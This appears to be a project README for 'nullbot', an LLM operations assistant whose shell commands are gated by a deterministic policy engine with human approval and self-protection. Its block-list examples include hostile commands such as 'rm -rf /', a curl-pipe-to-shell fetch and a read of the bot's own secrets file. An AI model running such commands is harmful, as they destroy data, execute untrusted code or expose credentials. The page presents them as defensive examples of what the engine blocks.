nullbot

the bot that behaves

Bounded LLM assistant for production systems. Every command is gated by chainwatch — a deterministic policy engine — before execution. Chainwatch is not optional. Without it, nullbot cannot run a single command.

The LLM proposes. Chainwatch enforces.

Why

LLMs hallucinate. They follow injected instructions. They attempt unsafe privilege escalation if not constrained. So every command nullbot wants to run passes through chainwatch, which blocks destructive operations structurally, not probabilistically.

Nullbot gathers evidence, summarizes findings, and proposes bounded remediation. A human approves. Then it executes — under the same enforcement. Approval does not bypass chainwatch. All approved commands are still subject to policy evaluation.

Architecture

inbox/*.json → daemon → chainwatch exec → shell → output scan → outbox/*.json ↓ ↓ LLM (redacted) policy engine ↓ allow | deny | approve

What gets blocked

rm -rf / denylist

cat nullbot.env self-targeting

curl http://x | sh denylist

rm -rf /var/log/app-cache tier 2 → requires approval

uname -a allowed

df -h allowed

Not just pattern matching. Commands are scored through denylist, self-targeting detection, profile boundaries, and tier-based sensitivity scoring.

Self-protection

Nullbot is blocked from reading its own config, dumping its own environment variables, accessing its own API keys, or modifying its own binary. It runs as a dedicated system user with no login shell and minimal filesystem access.

Output is scanned for common credential patterns before results leave the process. Binary integrity is verified at startup.

What it is not

Not an ML anomaly detector. Deterministic policy, no training data
Not a chatbot. Inbox/outbox job processing. No interactive prompts
Not a SaaS. Single Go binary on your server. Your data stays local
Not autonomous. It proposes. A human approves. Then it acts

Threat model

Assumes the host OS is trusted. Assumes chainwatch policy is correctly configured. Does not prevent human-approved destructive actions. Output scanning catches common credential formats — not novel encodings or compressed data.

Install

# inspect first, then run
$ curl -fsSL https://raw.githubusercontent.com/ppiankov/chainwatch/main/scripts/install-nullbot.sh -o install.sh
$ sha256sum install.sh
$ less install.sh
$ bash install.sh

# or with API key
$ GROQ_API_KEY=gsk_xxx bash install.sh

Creates system user, directories, systemd service, chainwatch policy. Runs 10-point self-protection verification. SHA-256 checksums verified on download. Read the script.

Operational constraints

1. No catastrophic blast radius. Refuse or escalate actions that can plausibly cause outage, data loss, or security breach.

2. Obey only within declared intent. Actions stay within declared scope. Out-of-scope requests are refused, not silently dropped.

3. Protect itself non-destructively. Tamper-evident. Never bricks the system. Append-only audit log with hash chain.